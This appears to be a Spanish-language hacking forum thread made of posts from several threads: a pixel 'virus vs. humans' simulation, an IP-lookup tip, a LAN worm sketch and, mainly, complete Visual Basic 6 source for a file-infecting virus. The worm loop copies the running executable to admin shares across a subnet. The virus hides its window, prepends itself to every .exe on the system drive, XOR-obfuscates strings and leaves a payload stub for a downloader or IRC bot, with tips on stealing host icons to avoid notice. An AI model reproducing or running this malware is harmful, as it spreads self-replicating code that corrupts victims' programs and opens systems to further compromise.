Mensajes

Me alegro de que os guste... lo que no entiendo es porque mis bichitos se agrupan arriba del todo!! tengo un error en el código y no sé encontrarlo.

Help me 

Es facil, pero dinos antes para que lo vas a usar...

Si lo quieres para visitar una web del tipo "cualesmiip" o "showmyip", etc... lo unico que tienes que hacer es:

1) winsock.connect url,80
2) buscar un patrón que te situe delante de la IP, en el código fuente
3) con las funciones InStr y Mid sacas la IP

El código te dejo que lo pienses tú, además creo recordar que hay algo ya programado en este foro usando la web de no-ip.com para ver la IP pública

Suerte

[1)]

Buenas!!

En una de mis rayadas de fin de semana me ha dado por programarme un "mundo virtual" de seres pixelados, os dejo una foto del programa:



Hay 3 clases de píxeles:

• Humanos
• Virus
• Doctores

Todos los bichitos se mueven aleatoriamente por la pantalla, cumpliendo unas normas básicas, estas son:

1) Si un Virus toca un Humano, el Humano se convertirá en Virus (50% de las veces).
2) So un Virus toca un Doctor, el Doctor se convertirá en Virus (30% de las veces)
3) Si un Doctor toca un Virus, el Virus se curará:
     El 70% de las veces se convertirá en Humano
     El 30% de las veces se convertirá en Doctor

Las reglas son sencillas, y como todo está programado bajo Randomize... a veces ganan los virus y otras veces los Humanos, pero tengo un problema, a ver si entre unos cuantos lo mejoramos...

1) Si dejamos un buen rato los bichitos enchufados, éstos terminan agrupándose en la parte superior izquierda (hay que solucionarlo)
2) Molaría añadir una raza nueva, por ejemplo Mujeres que ayudaran a reproducir más humanos
3) Molaría cambiar las leyes y poner, por ejemplo, hombres lobo y vampiros, etc...
4) Estaría bien añadir sonidos cuando infecten o desinfecten bichos, con la API Beep.

A parte el modo en el que está programado consume bastantes recursos, sería bueno mejorar este punto...



Dejo el código como curiosidad, no es muy útil pero a mi me divierten este tipo de cosas. Si conseguis mejorar algo o añadir cosas ponerlo en este post, el source esta comentado al máximo, si no se entiende algo me lo preguntais, pero creo que es facil de entender.

PD: La idea de este programa no es mía, ví un código similar en pscode, yo me he quedado con la idea y he hecho mejoras (como la raza de los médicos por ejemplo). Saludos!!

[1)]

Es facil, te explico lo que yo haría...

1) Hacer que el virus recoja info del PC: IP local y Mascara de subred (por ejemplo haciendo un ipconfig /all y depurando la salida).

2) Calcular cuantos equipos hay en la lan a partir de la máscara de subred, por ejemplo:

Direccion: 192.168.10.58
Mascara: 255.255.255.0

Con estos datos sabrás que hay IP's comprendidas entre: 192.168.10.1 hasta 192.168.10.254

3) Empezar un bucle bestial de este tipo:

Código [Seleccionar] Expandir


    For i = 1 To 255
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\C$"     'C:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\D$"     'D:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\E$"     'E:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\F$"     'F:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\G$"     'G:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\ADMIN$" 'C:\Windows
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\PRINT$" 'C:\WINDOWS\system32\spool\drivers
    Next i


4) Ahora te lo puedes currar y editar los archivos de inicio de forma remota (copiando archivos en la carpeta inicio, modificando win.ini, etc...)

No hay que decir que necesitas permisos administrativos en la lan para poder hacer esto

5) Y para rizar el rizo, tendrías que encontrar el comando que te permite ver los recursos que comparte un equipo, te doy una pista...

net view [\\nombre_pc] te da todos sus recursos xD

Saludos!! y no seas malo haciendo lanworm's

Lo que quieres hacer es un generador de fuerza bruta, que genere todas las combinaciones desde "aaaaaaa" hasta "zzzzzzzz". Te dejo 3 engines de fuerza bruta, hay uno de ellos que es rapidisimo y muy bueno, muestra los password por segundo que genera. Los códigos no son míos.

PD: Usa un bucle for dentro de otro, dentro de otro for, dentro de otro for... no te servirá, mirate estos engines

Saludos!!

Muy útil E0N, a seguir asi

En mi máquina virtual el virus no consume tantos recursos, pero eso es tan facil como poner un sleep cada 100 archivos y solucionado.

El tema de los parametros ya era consciente, se puede solucionar de forma sencilla con una función más que recoja los parametros y se los envíe a la aplicación infectada

Para terminar, los archivos de system32 (cmd, taskkill, tasklist, etc...) tiene habilitado el SFC de Windows (Sistema de Protección de Archivos), si un virus o similar modifica, sobreescribe o elimina un ejecutable, esté se creará de nuevo pasado unos segundos. Es por eso que no se puede infectar el cmd, explorer, tasklist, etc...

Saludos!!

ya que de tu manera, el icono siempre sera el de TU programa, es decir, el del VB, esto canta mucho, si alguien se mete a buscar algo en su HD y se encuentra con los ejecutables todos con el mismo icono del VB...XDDD

Exacto, pero eso tiene facil solución... antes de infectar el archivo hay que leer su icono y escribirlo a nuestro código vírico, en mis pruebas con una máquina virtual funciona de maravilla, solo tienes que añadir el módulo de IconChanger.bas que ya postee aqui.

Saludos!!

PD: esto no estaba ya explicado por WarGhost en un papper???

Mi código es del 29 Junio 2006, desconozco si WarGhost lo hizo antes o después.

Saludos!!

Esté código lo programé enterito para el Laboratorio del foro, pedí si podía sacar el código fuera y aquí lo teneis, de pueden mejorar algunas cosillas, vosotros mismos...

Saludos!!

[Infección de Ejecutables en Visual Basic 6.0]

Infección de Ejecutables en Visual Basic 6.0

Bueno, ya he finalizado el proyecto, lo he testeado en una máquina virtual y funciona a la perfección Os dejo el código comentado, tambien os dejo una versión compilada del proyecto y un ZIP con el source

Como funciona?

1- El programa principal busca por el disco duro todos los archivos con extension *.exe
2- Cuando encuentra uno, crea una copia del virus con el siguiente formato: [VIRUS]+Marca+[HUESPED]
3- Cuando se ejecuta un archivo infectado, el virus busca la Marca para separar el [VIRUS] del [HUESPED] y ejecutarlos de forma separada



Form1.frm

Código (vb) [Seleccionar] Expandir


Private Sub Form_Load()
    App.TaskVisible = False
    If App.PrevInstance = True Then End
    SelfCheck
End Sub


InfectModule.bas

Código (vb) [Seleccionar] Expandir



Function SelfCheck()
    On Error Resume Next
    Dim MyCode As String
   
    'Se abre a si mismo, lee su codigo y lo guarda en "MyCode"
    Open App.path & "\" & App.EXEName & ".exe" For Binary As #1
        MyCode = Input(LOF(1), 1)
    Close #1
   
    'Separa "MyCode" buscando la marca de infección (**X**)
    Buffer = Split(MyCode, "(**X**)")
   
    If UBound(Buffer) = 1 Then
        'Si existe la marca: Llama la funcion "DivideFiles" con el argumento del código del Huésped
        Hostage = Buffer(1)
        DivideFiles Hostage
    Else
        'Si NO existe la marca: Llama la funcion "Subfolders" con el argumento de unidad del Sistema (C:\)
        Subfolders (Environ("SystemDrive") & "\")
        DoEvents
        End
    End If
End Function

Function DivideFiles(ByVal Hostage As String)
    Randomize
    On Error Resume Next
    Dim TmpFile As String
   
    'Crea un archivo temporal con el código del Huésped, por ejemplo:
    'C:\DOCUME~1\USER\CONFIG~1\Temp\85061.exe
    TmpFile = Environ("TMP") & "\" & Int((Rnd * 99999) + 1) & ".exe"
   
    Open TmpFile For Binary As #1
        Put #1, , Hostage
    Close #1
   
    DoEvents
    'Ejecuta el archivo temporal (el Huésped) y llama al "PayLoad" del virus
    Shell TmpFile, vbNormalFocus
    Call ExecPayload
End Function

Function InfectFile(ByVal Victim As String)
    On Error Resume Next
    Dim VictimCode As String
    Dim NewCode As String
    Dim MyCode As String
   
    'Se abre a si mismo, lee su codigo y lo guarda en "MyCode"
    Open App.path & "\" & App.EXEName & ".exe" For Binary As #1
        MyCode = Input(LOF(1), 1)
    Close #1
   
    'Abre el archivo Huésped, lee su código y lo guarda en "VictimCode"
    Open Victim For Binary As #1
        VictimCode = Input(LOF(1), 1)
    Close #1
   
    'Crea la variable "NewCode" donde se guarda: MyCode + (**X**) + VictimCode
    NewCode = MyCode & "(**X**)" & VictimCode
   
    'Sobrescribe el archivo Huésed con el infectado
    Open Victim For Binary As #1
        Put #1, , NewCode
    Close #1
End Function

Function IsInfected(ByVal File As String) As Boolean
    On Error Resume Next
    Dim FileCode As String
       
    'Abre el archivo "File", lee su codigo y lo guarda en "FileCode"
    Open File For Binary As #1
        FileCode = Input(LOF(1), 1)
    Close #1

    'Separa "FileCode" buscando la marca de infección (**X**)
    Buffer = Split(FileCode, "(**X**)")
   
    'Devuleve "True" o "False" si ha encontrado la marca (**X**)
    If UBound(Buffer) <> 0 Then
        IsInfected = True
    Else
        IsInfected = False
    End If
End Function

Function Subfolders(path)
    On Error Resume Next
    'Se cifra el string que carga el objeto Scripting.FileSystemObject
    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
    Set Drives = fso.Drives

    newpath = path
    Set Fold = fso.GetFolder(newpath)
    Set Files = Fold.Files
   
    For Each File In Files
        ext = fso.GetExtensionName(File.path)
        ext = LCase(ext)
        nam = LCase(File.Name)
        If (ext = "exe") Then
            If IsInfected(File.path) = False Then
                InfectFile (File.path)
                DoEvents
            End If
        End If
    Next
   
    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next
End Function

Function ExecPayload()
    '#######################################################
    '##  Si quieres que los archivos infectados ejecuten  ##
    '##  la función de buscar e infectar nuevos archivos  ##
    '##  elimina los comentario que hay a continuación    ##
    '#######################################################
   
    'Subfolders (Environ("SystemDrive") & "\")
    'DoEvents
   
    MsgBox "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
    End
End Function


Encryption.bas

Código (vb) [Seleccionar] Expandir


Function bullet(FullCode)
    'Funcion que cifra Strings con el operador XOR
   
    For i = 1 To Len(FullCode)
        Current = Mid(FullCode, i, 1)
        Code = Chr(Asc(Current) Xor 2)
        bullet = bullet + Code
    Next
End Function




Adjunto el código fuente del proyecto. OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD

Ir con cuidado, Saludos!!